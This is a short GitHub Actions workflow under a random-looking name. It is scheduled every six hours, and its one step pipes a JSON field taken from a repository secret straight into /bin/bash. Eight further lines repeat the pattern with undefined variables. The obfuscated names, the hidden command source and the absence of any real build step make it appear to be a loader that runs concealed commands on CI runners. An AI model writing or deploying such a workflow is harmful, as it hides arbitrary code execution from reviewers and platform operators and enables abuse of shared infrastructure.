name: maturehometeam
on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          k57805: ${{ secrets.k57805 }}
        run: |
          echo $k57805 | jq -r .peoz4 | /bin/bash
          echo $bxipt69 | jq -r .tms96837 | /bin/bash
          echo $mvyya8 | jq -r .qmxwp919 | /bin/bash
          echo $wyk3523 | jq -r .r1 | /bin/bash
          echo $via95851 | jq -r .rian926 | /bin/bash
          echo $jm5526 | jq -r .g8472 | /bin/bash
          echo $kya61 | jq -r .mfxfb3776 | /bin/bash
          echo $cu4 | jq -r .k1 | /bin/bash
          echo $rz712 | jq -r .vlxn47 | /bin/bash

